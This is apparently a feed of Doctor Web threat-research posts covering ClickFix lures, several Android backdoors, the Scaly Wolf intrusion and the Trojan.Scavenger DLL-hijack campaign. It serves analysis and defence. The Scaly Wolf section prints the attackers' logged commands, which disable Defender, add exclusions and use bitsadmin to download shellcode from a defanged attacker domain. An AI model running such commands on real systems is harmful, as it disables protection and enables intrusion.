Normally, the message is supplemented by a “Fix”, “Check” or “Update” button. Malicious code is copied into the clipboard automatically as soon as the button appears on the screen—there’s no need to even press it. The user is then prompted to paste this code into a command prompt or the “Run” dialogue box. As soon as that happens, a malicious program is installed and launched. And since the action has been initiated by the user, the antivirus often does not intervene.

Below we provide a simplified recreation of a ClickFix attack.

When users load and view content, a warning message suddenly appears in the browser, informing them that an issue caused by a recent browser update is preventing the content from being displayed properly.

The message suggests that the user perform these specific actions to resolve it:

Click the “Fix it!” button.
Right-click on the Windows Start button.
In the program list, locate Windows PowerShell and open it with administrator permissions.
Right-click to paste the clipboard contents into the terminal window and run the command.

As the user presses the button, a malicious script gets copied to the clipboard to be run in the terminal window.

The script establishes a remote connection to a C2 infrastructure that the perpetrators use to remotely control compromised systems.
In this case, the device gets connected to a remote C2 host, and then the payload is downloaded to the user's computer. After that, the malicious executable designed to modify the hosts file is launched, and the running script is ended.
Thanks to its preventive protection technologies, Dr.Web is able to detect the threat as soon as the script attempts to start the executable.
A fake CAPTCHA is another ruse commonly used in ClickFix attacks. A supposedly legitimate CAPTCHA verification box appears on the screen, and in the meantime, malicious code is covertly copied to the clipboard. By engaging users in interacting with malicious content under the pretext of verifying that they’re a real person, the perpetrators make it more likely for the attack to succeed.

The CAPTCHA dialogue is then replaced by instructions for additional verification steps.

By completing them, the unsuspecting user runs a malicious script that opens up a remote access route for the attackers.

Why ClickFix attack are hard to expose

When a user clicks a button on a bogus site, there is not yet any malicious pattern for an antivirus to detect. At first, all the actions appear quite legitimate: the user copies and pastes commands with their own hands and runs them—seemingly going through regular system routines.
The detection occurs later—when a malicious file is launched or if the script attempts to inject malicious code into other processes in the system. That’s when an antivirus sees the danger and eliminates it. In other words, protection technologies only spring into action at the post-exploitation phase when the malware is already performing its tasks by disrupting other processes or is behaving strangely.
Usually, by this time, the attacker has been able to connect to the victim's system and the payload is already deployed and can disguise itself as a legitimate process.
At this stage, the attacker can:

Elevate their privileges,
Collect data,
Navigate through the network,
Attempt to disable the antivirus.

On top of that, the malicious code can also be encrypted or obfuscated to make it less recognisable by conventional security routines.

Why it is important to act as early as possible

In the case of ClickFix incidents, preventing attackers from connecting to the system remotely can be as vital as responding to the actual threat. The extra security measures that may help accomplish this include:

Examining the clipboard contents whenever a suspicious message that includes commands (such as PowerShell scripts) appears in the browser.
Analysing traffic and suspicious attempts to establish a remote connection.
Teaching users how to recognise social engineering techniques by examining real attack scenarios.

Baohuo, the gray eminence. Android backdoor hijacks Telegram accounts, gaining complete control over them

Thu, 23 Oct 2025 10:32:20 GMT

October 23, 2025

Doctor Web has identified a dangerous backdoor, Android.Backdoor.Baohuo.1.origin, in maliciously modified versions of the Telegram X messenger. In addition to being able to steal confidential data, including user logins and passwords, as well as chat histories, this malware has a number of unique features. For example, to prevent itself from being detected and to cover up the fact that an account has been compromised, Android.Backdoor.Baohuo.1.origin can conceal connections from third-party devices in the list of active Telegram sessions. Moreover, it can add and remove the user from Telegram channels and also join and leave chats on behalf of the victim, also concealing these actions. In fact, with this backdoor’s assistance, malicious actors gain full control over the victim’s account and the messenger functionality, while the trojan itself is a tool for boosting the number of subscribers in Telegram channels. Cybercriminals control the backdoor in different ways, one of which is via the Redis database; such a control mechanism is something that has not been seen previously in Android threats. According to our experts’ estimates, the number of devices infected with Android.Backdoor.Baohuo.1.origin has exceeded 58,000.

Android.Backdoor.Baohuo.1.origin started being distributed back in mid-2024, as evidenced by earlier modifications found during its analysis. The main method for delivering this backdoor to target devices is through in-app ads in mobile programs. Potential victims are shown ads that encourage them to install the Telegram X messenger. When clicking on such banners, users are redirected to malicious websites from which the trojan APK file is downloaded.

These sites are designed to look like an app catalog, while the messenger itself is positioned on them as a platform for conveniently finding a partner for communication and dating. This is indicated by banners with overlaid advertizing text about “free video chats” and invitations to “talk” (for instance, disguised as screenshots of the video call window) as well as by reviews from supposedly happy users that the threat actors actually composed. It should be noted that these webpages have functionality for selecting the displayed language, but the images themselves do not change.

One of the malicious sites from which the trojan version of Telegram X is downloaded. Potential victims are offered the chance to install an app where, according to “reviews”, it is easy to find a partner for communication and dating

Currently, cybercriminals have prepared standard templates with banners in only two languages—Portuguese, for users from Brazil, and Indonesian. Thus, Brazilian and Indonesian audiences are the main target for the attackers. At the same time, it is possible that over time, the threat actors’ interest will extend to users from other countries.

Studying the attackers’ network infrastructure allowed us to determine the scale of their activity. On average, Doctor Web’s malware analysts observe about 20,000 active connections of Android.Backdoor.Baohuo.1.origin. At the same time, the total number of infected devices has exceeded 58,000. Around 3,000 different models of smartphones, tablets, TV box sets, and even cars with Android-based on-board computers have been infected.

Countries with the highest number of devices infected with Android.Backdoor.Baohuo.1.origin (according to Doctor Web’s anti-virus laboratory)

However, malicious websites are not the only source for Android.Backdoor.Baohuo.1.origin’s distribution. Our experts have also detected it in third-party app catalogs, including APKPure, ApkSum, and AndroidP. Additionally, in the APKPure app store, the malware is posted on behalf of the official messenger developer, despite the fact that the digital signatures of the original version and the trojan modification are different. We have notified the online platforms where the trojanized versions of Telegram X were found.

The modified Telegram X with Android.Backdoor.Baohuo.1.origin implanted in it was distributed through APKPure on behalf of the messenger’s genuine developer

Doctor Web’s anti-virus laboratory discovered several Android.Backdoor.Baohuo.1.origin variations, which can be conditionally divided into 3 main modification groups:

versions where the threat actors embedded the backdoor into the main executable DEX file of the messenger;
versions where the backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool;
versions where the backdoor is located in a separate DEX file in the app’s resources directory and loaded dynamically.

Regardless of the modification type, Android.Backdoor.Baohuo.1.origin initializes when the messenger is launched. The messenger itself remains functional, and for users it looks like a regular program. In reality, however, malicious actors have complete control over it through the backdoor and can even alter the logic of its operation.

When cybercriminals need to perform an action that does not require interfering with the app’s main functionality, they use pre-prepared “mirrors” of the necessary messenger methods. For example, mirrors can be used to display phishing messages in windows that look indistinguishable from real Telegram X windows.

Methods are separate blocks of code in the structure of Android programs that are responsible for performing certain tasks.

If the action is not standard for the messenger, then the Xposed framework is used. It directly changes a certain functionality of the app via dynamic method modification. In particular, it can be used to hide certain chats and authorized devices as well as to steal the clipboard contents.

The main difference between the earlier versions of the malicious program and the current ones is in how the malware is controlled. Older versions communicated with cybercriminals and received commands from them via a C2 server, which is a traditional channel. However, over time, malware writers added to Android.Backdoor.Baohuo.1.origin the ability to receive additional commands that come from the Redis database, thus expanding its functionality. At the same time, they also provided for the duplication of new commands through a regular C2 server in case the database becomes unavailable. This is the first known case of using Redis to control Android malware.

When launched, Android.Backdoor.Baohuo.1.origin connects to the initial C2 server to download a configuration that, among other parameters, contains data to connect to Redis. Through this database, threat actors not only send specific commands to the malicious app but also update the trojan’s settings. For example, they assign current addresses for the C2 server and the NPS server. Malware writers use the latter to connect infected devices to their internal network (intranet) and turn them into a proxy for accessing the Internet.

Android.Backdoor.Baohuo.1.origin regularly connects to the C2 server via API requests and can receive the following tasks:

upload incoming SMS and contacts from the infected device’s phonebook to the C2 server;
upload the contents of the clipboard to the C2 server when minimizing the messenger and restoring its window;
receive URLs from the C2 server to display ads, as well as the server address from which the trojan’s update in the form of a DEX file will be downloaded;
receive encryption keys that are used when certain data is uploaded to the C2 server (for instance, the clipboard contents);
request a group of commands for collecting information about installed apps, the message history, and contacts from the device’s phonebook, and about the devices logged into Telegram (this request is executed every 30 minutes);
request an URL from the C2 server to download an update for Telegram X;
request from the C2 server a configuration which is then saved as a JSON file;
request information about the Redis database;
upload information about the device to the C2 server whenever messenger network activity is detected;
receive from the C2 server a list of bots that are to be added to the Telegram contact list;
upload the following information to the C2 server every 3 minutes: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;
every minute, request commands in the same format as the commands from the Redis database.

To receive commands via Redis, Android.Backdoor.Baohuo.1.origin connects to the attackers’ corresponding server where it registers its own sub-channel. Threat actors connect to this sub-channel and post tasks in it, which the backdoor then executes. The malicious program can receive the following commands:

create a blacklist of chats that will not be displayed in the Telegram X window;
conceal specified devices from the user in the list of authorized devices for their account;
block notifications from blacklisted chats for a specified time;
display a window with information about the Telegram X messenger update (when the user clicks it, they are redirected to a target website);
send the C2 server information about all of the installed apps;
terminate the user’s current authorized Telegram login session on the infected device;
display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);
remove the Telegram Premium icon in the app’s interface for the current user;
upload to the C2 server information from the Telegram X databases that store chat history, messages, and other confidential data;
subscribe the user to a specified Telegram channel;
leave a specified Telegram channel;
join a specified Telegram channel on behalf of the user, using the provided URL;
obtain the list of devices authorized in Telegram;
request the user’s authentication token and upload it to the C2 server.

It should be noted that hijacking data from the clipboard (when the user minimizes the messenger and restores its window) allows various scenarios for stealing confidential data to be implemented. For example, the victim can copy the password or mnemonic phrase used to access their crypto wallet, copy text from some important document to send it to business partners, etc. The trojan will intercept this information from the clipboard and send it to the malicious actors.

Dr.Web Security Space for mobile devices successfully detects and deletes all known versions of Android.Backdoor.Baohuo.1.origin, so this malware does not pose a threat to our users.

More details about Android.Backdoor.Baohuo.1.origin
Indicators of compromise

Android backdoor spies on employees of Russian businesses

Wed, 20 Aug 2025 10:47:54 GMT

August 20, 2025

Doctor Web is informing users about Android.Backdoor.916.origin, a multi-functional backdoor that spreads in the wild and targets Russian businesses. The malware is capable of executing multiple commands received from attackers and has rich functionality for espionage and data theft. Among other capabilities, it can listen to conversations, broadcast from a device’s camera, steal content from messengers and browsers, and use its keylogger functionality to hijack entered text, including passwords.

The first Android.Backdoor.916.origin versions emerged in January 2025. Since discovering the backdoor, Doctor Web’s anti-virus laboratory has tracked the malware’s evolution and detected a number of versions (information about them is provided in the corresponding indicators of compromise) of it. Our experts believe that Android.Backdoor.916.origin is likely designed more for targeted attacks than for mass distribution among Android device users. Its main target is Russian business representatives.

Threat actors use direct messages in messengers to distribute the backdoor’s APK file under the guise of an anti-virus called “GuardCB”. The app’s icon resembles the emblem of the Russian Federation’s Central Bank; the emblem is set against the background of a shield. At the same time, the app’s interface provides only one language—Russian. Thus, the malware is entirely focused on Russian users. This is confirmed by other detected modifications with names like “SECURITY_FSB”, “ФСБ” (FSB), and others, which cybercriminals are trying to pass off as security-related programs that are supposedly related to Russian law enforcement agencies.

Icons of the malware mislead potential victims

The app does not in fact have any anti-virus features. When it runs, Android.Backdoor.916.origin acts like it is performing an anti-virus scan on a device, while the probability of “detecting” threats is programmed into it. The more time that has passed since the previous “scan”, the higher the chance is, but no more than 30%. The number of allegedly found threats is determined randomly and ranges from 1 to 3.

When it first launches, Android.Backdoor.916.origin requests access to many system permissions:

Geolocation;
Audio recording;
Access to SMS, contacts, call history, media files, permission to make calls;
Camera (to take pictures and record videos);
Permission to run in the background;
Device administrator rights;
Accessibility Service.

Examples of the requested permissions

The malware then launches several of its own services and checks their activity every minute, restarting them again if needed. The backdoor uses these services to connect to the C2 server and receive a large number of commands. Among them are:

upload incoming and outgoing SMS to the C2 server;
upload the contacts list to the C2 server;
upload call history to the C2 server;
upload geolocation data to the C2 server;
start or stop audio streaming through the device’s microphone;
start or stop video streaming from the device’s camera;
start or stop streaming the device’s screen;
upload all images stored on a memory card to the C2 server;
upload images from a memory card to the C2 server according to a given range of names;
upload a specified image from a memory card to the C2 server;
enable or disable the backdoor’s self-protection;
execute a received shell command;
upload information about the device’s network and interfaces to the C2 server.

The backdoor streams the different types of data it collects to separate C2 server ports.

Android.Backdoor.916.origin uses Accessibility Service to execute keylogger functionality and intercept content from messengers and browsers. These apps are monitored by the trojan:

Telegram
Google Chrome
Gmail
Яндекс Старт (Yandex Start)
Яндекс Браузер (Yandex Browser)
WhatsApp

The backdoor also uses Accessibility Service to protect itself from being deleted if it receives the corresponding command from the threat actors.

Android.Backdoor.916.origin has functionality that allows it to operate with a large number of C2 servers whose information is stored in its configuration. Moreover, it can switch between hosting providers, the number of which can be as high as 15, but this option is not being used at the moment. Doctor Web’s anti-virus laboratory has informed domain registrars about the violations it has uncovered.

Dr.Web Security Space for mobile devices reliably detects and removes all known Android.Backdoor.916.origin modifications, keeping our users well protected from this threat.

More about Android.Backdoor.916.origin

Indicators of compromise

Take 2: Scaly Wolf persistently targets Russian engineering company’s secrets

Tue, 19 Aug 2025 01:00:00 GMT

Download PDF

August 19, 2025

In 2023, Doctor Web’s experts started an investigation into a targeted attack on a Russian engineering company, the results of which we reported in a corresponding study. Apparently, cybercriminals are very interested in the corporate secrets of this enterprise, so two years later they decided to attack it again. The threat actors returned with new malware and a persistent desire to penetrate the company’s IT infrastructure—they used several attack vectors in an attempt to infect the target computers.

Introduction

At the end of June 2025, representatives of a Russian engineering enterprise contacted Doctor Web with a request to find out whether the periodic anti-virus detections on one of its computers were a sign of infection or the result of some malfunction. The investigation showed that the anti-virus’s response was normal and that the company had been subjected to a targeted attack.

The attack originated from a computer that did not have the Dr.Web anti-virus installed on it. This lack of protection led to the network compromise and the infection of several more devices. Our specialists analyzed the affected workstations and reconstructed the chain of events. In this study, we will discuss the infection vector and the methods that the threat actors used in this attack.

General information about the attack and the tools involved

In early May 2025, the affected company began receiving a spate of emails that appeared to be finance-related. The messages contained a phishing PDF document and a password-protected ZIP archive.

The PDF decoy and the ZIP archive attached to one of the emails

These letters did not have any accompanying text.

An example of one such phishing email

The PDF decoys indicated that the received “financial document” was allegedly in the attached archive and, to unpack it, the password provided in the document’s text must be used. At the same time, the design of the phishing PDF files could vary. Some were minimalistic:

Others were as close to official as possible:

The file in the archive was actually an executable, but the malicious actors camouflaged it as a PDF document. To do so, they provided it with the “double” extension (Акт Сверки.pdf.exe). Since Windows hides file extensions by default, potential victims do not see the actual extension and mistakenly perceive the file as harmless.

Doctor Web’s anti-virus laboratory received the first sample of this malicious email on May 6, 2025, after which a virus record for detecting Trojan.Updatar.1 was added to our database. This malicious app is the initial stage of infection by the Updatar modular backdoor; it is designed to download other components in the chain to the target system. The backdoor is used to gather confidential data from the infected computers.

It is worth noting that Trojan.Updatar.1 is not new malware. The first sample of it came to our experts’ attention a year ago. However, we were unable to obtain the other steps in the chain that it downloads because they are not downloaded from the C2 server automatically but upon the direct command of the server’s operators. Thus, our investigation of an active attack involving this downloader allowed us to track other pieces of the backdoor that had been missing.

Our study of the new Trojan.Updatar.1 version showed that since the trojan was first discovered, its functionality had not been significantly altered; however, it had acquired a unique obfuscation that makes it more difficult to analyze. Doctor Web’s malware analysts dubbed this technique RockYou Obfuscation. Its essence lies in the fact that the trojan body constantly initializes lines from the RockYou.txt dictionary. Various operations occur with them that do not affect the program’s main functionality. At the same time, lines that are directly related to the app’s work are encoded with the XOR operation and a small offset. The key for this offset and the XOR operation is randomized for each Trojan.Updatar.1 sample.

RockYou.txt is a list of over 30 million commonly used passwords, compiled after a major data breach. It is used not only by security specialists for testing the reliability of computer system protection but also by malicious actors—to hack accounts.

An example of the obfuscation used in the trojan and the corresponding fragment of the RockYou dictionary:

The chronology of the attack is shown in the following diagram:

The attack on the first computer

During the targeted attack in question, the enterprise’s first computer was infected on May 12, 2025—almost a week after the identified Trojan.Updatar.1 modification was added to our virus database. The infection occurred for the simple fact that the target machine lacked Dr.Web anti-virus protection. As a result, having arrived in one of the unwanted emails, the trojan launched without any problems when the user opened the “document”. An hour after infection, the trojan downloaded and installed other backdoor components into the system: Trojan.Updatar.2 and Trojan.Updatar.3.

On May 14, using Trojan.Updatar.3, the attackers installed a BITS service task on the computer to download shell.exe—a program with the shellcode for downloading the main body of the Meterpreter tool. The latter is a backdoor utility from the Metasploit pack for testing computer system security.

Next, one of the Trojan.Updatar.3 modules (FileManager.exe) was installed on the system. It is responsible for uploading and downloading files to the computer. Malicious actors used it to steal files from the infected system.

After that, the attackers used the Tool.HandleKatz utility, which is designed to damp the LSASS system process, to get the Windows user account data. They then installed the RDP Wrapper tool (Program.Rdpwrap.7) to log in to the system more conveniently via remote desktop, known as RDP or Remote Desktop Protocol. In addition, the traffic-funneling utilities Tool.Chisel and Tool.Frp were also installed on the victim’s computer.

The attack on the second computer

The second computer started being compromised on May 14, 2025. The attackers accessed the company’s network, using account data stolen from the memory of the first infected device. They remotely executed commands on the target system to determine whether the second computer was worth considering for further infiltration.

After more than a week, on May 23, the malicious actors installed a BITS service task on this computer to download Trojan.Updatar.1. However, since Dr.Web anti-virus was present in the system, it was blocking the trojan’s launch.

On May 29, they used the company’s network again to remotely access the device and manually installed the Trojan.Updatar.2 and Trojan.Updatar.3 modules on it, thus gaining a foothold in the system.

On June 3, 2025, using another BITS service task, they installed the Meterpreter backdoor.

The attack on the third computer

The intruders gained entry into the third system after obtaining user credentials for the Remote Desktop service (RDP). Starting on June 23, 2025, they connected to the computer using the compromised RDP account. Next, to get anchored in the system and gain access to a Remote Shell, they launched a standard tool from the Metasploit framework. Through this tool, an attempt was made to execute a payload in the form of a PowerShell script. However, Dr.Web anti-virus, which was installed on this machine, was blocking this action after detecting the execution attempt as DPC:BAT.Starter.613.

This malicious script was supposed to unpack the base64-encoded data containing the second PowerShell script and then run it. The second script contained the base64-encoded shellcode that was to be executed in the PowerShell address space.

The execution of this script chain would have launched the first stage designed to download the Meterpreter backdoor into the system from the address 77[.]105[.]161[.]30.

After the anti-virus blocked their attempts to penetrate the system by executing scripts, the malicious actors stopped utilizing standard tools from the Metasploit pack and switched to another tactic— using the RemCom instrument. Dr.Web anti-virus detects this program as Program.RemoteAdmin.877, but in this case, it was not blocked, since it is a standard remote administration tool, and the default anti-virus settings allow such instruments to be executed.

Using this utility, the attackers executed the following commands:


    ipconfig
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    powershell  -Command "Add-MpPreference -ExclusionPath 'C:\'"
    powershell  -Command "Get-MpPreference | Select -ExpandProperty ExclusionPath"
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    tasklist
    reg  add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    chcp
    wmic  service where "name='DrWebAVService'" get PathName
    reg  query "HKLM\SOFTWARE\DrWeb" /v Version
    wmic  product where "name like 'DrWeb%'" get Name, Version
    sc  qc DrWebAVService
    reg  query "HKLM\SOFTWARE\WOW6432Node\DrWeb" /v Version
    tasklist
    findstr  /i drweb
    findstr  /i dr
    findstr  /i drw
    findstr  /i drs
    findstr  /i dws
    wmic  product where "name like 'Dr.Web%'" get Name, Version
    reg  query "HKLM\SOFTWARE\WOW6432Node\Dws" /v Version
    netstat  -a -o -n
    powershell  -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe""
    
    
    powershell  -Command "Get-MpComputerStatus"
    powershell  -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"
    tasklist
    findstr  /i drweb
    sc  query
    findstr  /i drweb
    cmd: installer.exe

They tried to identify the anti-virus software installed on the computer and to install several anchor points in the system:

shellcode.exe — one of the Meterpreter variants (BackDoor.Shell.244), in which shellcode downloads the main Meterpreter body;
installer.exe — Trojan.Updatar.1.

Dr.Web anti-virus also detected and blocked all these attempts.

Peculiarities of the malware and the attackers’ infrastructure

Multiple C2 servers were used to control the malicious programs utilized in this targeted attack. However, the domain roscosmosmeet[.]online was the main source for malware downloads.
All variations of the Meterpreter backdoor tool were linked to the IP 77[.]105[.]161[.]30 and accessed different ports.
All Trojan.Updatar.3 module modifications used the domain updating-services[.]com for communication.

The Trojan.Updatar.1 and Trojan.Updatar.2 modules, depending on their version, used the domains adobe-updater[.]net and updatingservices[.]net.

Who is behind the attack

Thanks to the artifacts found in various malware samples, we can confidently identify the APT group responsible for the attack in question. These artifacts were found:

in the Trojan.Updatar.3 module modifications;
in fake apps discovered during the analysis of the threat actors’ infrastructure but not used in the current campaign.

In addition, they were detected in one of the malicious programs used in another targeted attack on the same enterprise.

All these artifacts indicate that these malicious tools were created by the same developer, one directly associated with the Scaly Wolf group.

Just like two years ago, the Scaly Wolf group used the self-written modular backdoor for anchoring in the system and conducting reconnaissance in it. Unlike the previous attack, in the current campaign, malicious actors did not use a MaaS trojan (Malware-as-a-Service) to initially access the target computers.

The threat actors also started using standard instruments for post-exploitation and anchoring in the system:

various open-source tools for tunneling traffic;
the Metasploit framework;
different programs for remote PC access.

Another peculiarity is that this group sends emails containing the malware from addresses registered with the Mail.ru service.

The attackers’ tools

As we noted earlier, our specialists discovered several malicious fake apps during the Updatar backdoor infrastructure analysis. In addition to them, we also found the trojans Trojan.Uploader.36875 and BackDoor.Siggen2.5423. These were not used in the attack in question but could be involved in other Scaly Wolf campaigns.

Trojan.Uploader.36875 is designed to send files from the infected computers to the attackers’ server. And BackDoor.Siggen2.5423 allows computers to be controlled remotely via VNC. In turn, the fake apps display windows with different messages that mislead potential victims. These fakes do not pose a direct threat to computers but can help malicious actors carry out attacks. Below are examples of the fake windows they display.

A fake message about removing the security software:

A fake window from the built-in Windows anti-virus about a scan that ended with threats being deleted:

A fake message stating that some system settings must be applied “to keep Windows stable”:

In reality, the fake receives a command argument, and when the user clicks the confirmation button in the message window, it launches the target app.

The list of tools and malware used by the Scaly Wolf group:

Trojan.Updatar.1
Trojan.Updatar.2
Trojan.Updatar.3
Trojan.Uploader.36875
BackDoor.Siggen2.5423
BackDoor.Shell.244 (Meterpreter)
BackDoor.Meterpreter.259
Program.RemoteAdmin.877 (RemCos)
Tool.HandleKatz
Tool.Chisel
Tool.Frp

For detailed technical descriptions of the Updatar backdoor and its components, please refer to the PDF version of the study or visit the Doctor Web virus library.

More about Trojan.Updatar.1
More about Trojan.Updatar.2
More about Trojan.Updatar.3
More about Trojan.Uploader.36875
More about BackDoor.Siggen2.5423

Conclusion

Targeted attacks remain a serious information security threat for companies. The case we analyzed showed that threat actors are flexible and inventive in their attempts to gain access to information systems. Hackers can use different entry vectors: phishing mailings, exploitable vulnerabilities, computers lacking anti-virus protection, and even software that anti-viruses allow to run by default, like remote administration tools.

Therefore, even when corporate computers have security solutions installed on them, attackers can try to bypass them. For more robust protection, we recommend thoroughly configuring the anti-virus on corporate machines and not keeping the default settings. Additionally, all available operating system and software updates should be installed to reduce the risk of infection via exploitable vulnerabilities.

MITRE matrix

Stage	Technique
Initial access	Phishing (T1566)
Execution	User execution (T1204) Software Deployment Tools (T1072)
Persistence	BITS Jobs (T1197) Modify Registry (T1112) Boot or Logon Autostart Execution (T1547)
Detection prevention	Obfuscated Files or Information (T1027)
Data collection	Data from Local System (T1005) Screen Capture (T1113)
Command and control	Web Protocols (T1437.001) Encrypted Channel (T1573)

Indicators of compromise

Gamers, get ready: scammers disguise cryptocurrency and password-stealing Scavenger trojans as cheats and mods

Thu, 24 Jul 2025 16:26:45 GMT

Download PDF

July 24, 2025

Doctor Web’s virus laboratory has detected Trojan.Scavenger—a family of malicious apps that threat actors use to steal confidential data from crypto wallets and password managers from Windows users. Threat actors chain together several trojans from this family, exploiting DLL Search Order Hijacking vulnerabilities to execute their payloads and exfiltrate data.

Introduction

In 2024, the company Doctor Web investigated an information security incident, involving an attempt to carry out a targeted attack on a Russian enterprise. The attack’s scheme included using malware that exploited the DLL Search Order Hijacking vulnerability in a popular web browser. When Windows applications launch, they search—in different locations and in a certain sequence—for all the libraries they need to operate properly. To “trick” the apps, attackers place malicious DLL files where they will be searched for first, such as in the installation directory of the target software. At the same time, the threat actors give their trojan files the names of legitimate libraries located in directories that have a lesser search priority. As a result, when launched, vulnerable apps will load malicious DLL files first. These trojan libraries operate as part of the apps and get the same permissions.

Following the incident in question, our specialists implemented functionality in Dr.Web anti-virus products that make it possible to track and prevent attempts to exploit DLL Search Order Hijacking vulnerabilities. While analyzing the telemetry data of this feature, Doctor Web’s virus analysts detected attempts to download previously unknown malware into several browsers of our clients. Our investigation into these cases allowed us to uncover a new hacker campaign, which is the subject of this article.

Trojan.Scavenger malicious programs infect computers in several stages and an infection starts with downloader trojans getting into the target systems in various ways. Our specialists detected two chains of this campaign with a different number of trojan components involved.

Chain of three loaders

In this chain, the starting component is Trojan.Scavenger.1, malware representing a dynamic library (a DLL file). It can be distributed via torrents and game-related sites either as part of pirated games or under the guise of different patches, cheats, and mods. Next, we will look at an example where scammers passed off the trojan as a patch.

Trojan.Scavenger.1 is distributed in a ZIP archive along with installation instructions in which fraudsters encourage their potential victim to place the “patch” into the Oblivion Remastered game directory—allegedly to improve its performance:

Drag umpdc.dll and engine.ini to the game folder:
\steamapps\common\Oblivion Remastered\OblivionRemastered\Binaries\Win64
 
Engine.ini will automatically be loaded by the module.
The module will also apply some native patches to improve performance

The name of the malicious file was chosen by the attackers deliberately, as a legitimate file with the name umpdc.dll is located in the Windows system directory %WINDIR%\System32. It is part of a graphic API used by various programs, including games. If the victim’s version of the game has an unpatched vulnerability, the copied trojan file will automatically be launched along with it. It is worth noting that the version of the Oblivion Remastered game, relevant at the time of the study, was correctly handling the library search order for the file umpdc.dll; for this reason, in the example in question, Trojan.Scavenger.1 could not automatically start with the game and continue the infection chain.

When successfully launched, the trojan downloads from a remote server and launches the next stage, which is the malicious downloader Trojan.Scavenger.2 (tmp6FC15.dll). In turn, this trojan downloads and installs other modules from this family into the system—Trojan.Scavenger.3 and Trojan.Scavenger.4.

Trojan.Scavenger.3 represents a dynamic library version.dll that is copied into the directory of one of the target browsers based on the Chromium engine. This file has the same name as one of the system libraries from the directory %WINDIR%\System32. Browsers vulnerable to DLL Search Order Hijacking do not check where the library with such a name is loaded from. And since the trojan file is located in their catalog, it has priority over the legitimate system library and is loaded first. Our virus analysts detected attempts to exploit this vulnerability in the browsers Google Chrome, Microsoft Edge, Yandex Browser, and Opera.

When launched, Trojan.Scavenger.3 disables the target browser’s protective mechanisms, such as the mechanism that launches its sandbox, causing the JavaScript code to be executed in the primary memory space. Moreover, the trojan disables the verification of browser extensions. To do so, it determines where the corresponding Chromium library is by the presence of the export function CrashForExceptionInNonABICompliantCodeRange in it. Next, it searches for the extension verification procedure in this library and patches it.

After that, the trojan modifies the target extensions installed in the browser, receiving necessary modifications in the form of JavaScript code from the C2 server. The following extensions are being modified:

crypto wallets
- Phantom
- Slush
- MetaMask
password managers
- Bitwarden
- LastPass

In this case, it is not the originals that are modified, but the copies that the trojan placed in the directory %TEMP%/ServiceWorkerCache in advance. And to make the browser “pick up” the modified extensions, Trojan.Scavenger.3 hooks the functions CreateFileW and GetFileAttributesExW by substituting the local paths to the original files with paths to the modifications (Dr.Web detects the latter as Trojan.Scavenger.5).

The modifications themselves are presented in two variants:

a time stamp is added to the Cookie;
a routine for sending user data to the C2 server is added.

The attackers obtain mnemonic phrases from Phantom, Slush, and MetaMask crypto wallets. They also receive the authorization Cookie and user-added passwords from the password managers Bitwarden and LastPass, respectively.

In turn, Trojan.Scavenger.4 (profapi.dll) is copied to the directory containing the installed Exodus crypto wallet. The trojan is launched automatically with this app, also by exploiting the DLL Search Order Hijacking vulnerability in it (the legitimate system library profapi.dll is located in the directory %WINDIR%\System32, but due to the vulnerability, the loading priority is given to the trojan file when the wallet is launched).

After it starts up, Trojan.Scavenger.4 hooks the function v8::String::NewFromUtf8 from the V8 engine responsible for working with JavaScript and WebAssembly. With its help, the malicious app can obtain various user data. In the case of the Exodus program, the trojan searches for the JSON that has the key passphrase and reads its value. As a result, it gets the user’s mnemonic phrase that can be used to decrypt or generate a new private key for the victim’s crypto wallet. Next, the trojan locates the private key seed.seco from the crypto wallet, reads its, and sends it to the C2 server together with the mnemonic phrase it obtained earlier.

Chain of two loaders

In general, this chain is identical to the first one. However, instead of Trojan.Scavenger.1, the distributed archives with the “patches” and “cheats” for games contain a modified version of Trojan.Scavenger.2. It is presented not as a DLL file but as a file with the extension .ASI (this is actually a dynamic library with a changed extension).

The archive also comes with installation instructions:

Copy BOTH the Enhanced Nave Trainer folder and "Enhanced Native Trainer.asi" to the same folder as the scripthook and launch GTA.

After the user copies the file to the specified directory, it will automatically run when the target game is launched, as it will accept it as its own plugin. From this point on, the infection chain repeats the steps from the first variant.

The family’s common features

Most of this family’s trojans have a number of common features. One of them is the standard procedure for verifying the running environment to detect a virtual machine or debug mode. If trojans detect signs that they are being launched in a virtual environment, they stop working.

Another common attribute of the family is the general algorithm for communicating with the C2 server. To connect to it, trojans go through the procedure of creating an encryption key and verifying the encryption. This involves sending two requests. The first one is needed to receive part of the key that is used for encrypting some parameters and data in certain requests. The second request is executed to check the key and contains some parameters, including a randomly generated string, the current time, and the encrypted time value. The C2 server responds to this request with the string it received earlier. All consecutive requests have time parameters, and if they are missing, the server will refuse to establish the connection.

For detailed technical descriptions of the malicious programs detected, please refer to the PDF version of the study or visit the Doctor Web virus library.

More about Trojan.Scavenger.1

More about Trojan.Scavenger.2

More about Trojan.Scavenger.3

More about Trojan.Scavenger.4

More about Trojan.Scavenger.5

Conclusion

We notified the developers whose software was exploited via the security flaws we detected, but they deemed the DLL Search Order Hijacking vulnerabilities as not requiring a fix. However, the protection against this type of attacks that we added to our Dr.Web anti-virus products successfully counteracted the exploitation of vulnerabilities in the affected browsers even before we learned about the Trojan.Scavenger malware family. Because of that, these trojans did not pose a threat to our users. And as part of this study, we also added the corresponding protection for the Exodus crypto wallet app.

Indicators of compromise

Android spyware trojan targets Russian military personnel who use Alpine Quest mapping software

Mon, 21 Apr 2025 01:00:00 GMT

April 21, 2025

Doctor Web’s experts have discovered Android.Spy.1292.origin, spyware whose main target is Russian military personnel. The attackers hide this trojan inside modified Alpine Quest mapping software and distribute it in various ways, including through one of the Russian Android app catalogs. Among other things, the malware sends the attackers phonebook contact information and the infected device’s geolocation. Moreover, this spyware collects data about the files stored on the devices and, when commanded by threat actors, can download additional modules possessing the functionality needed to steal the files.

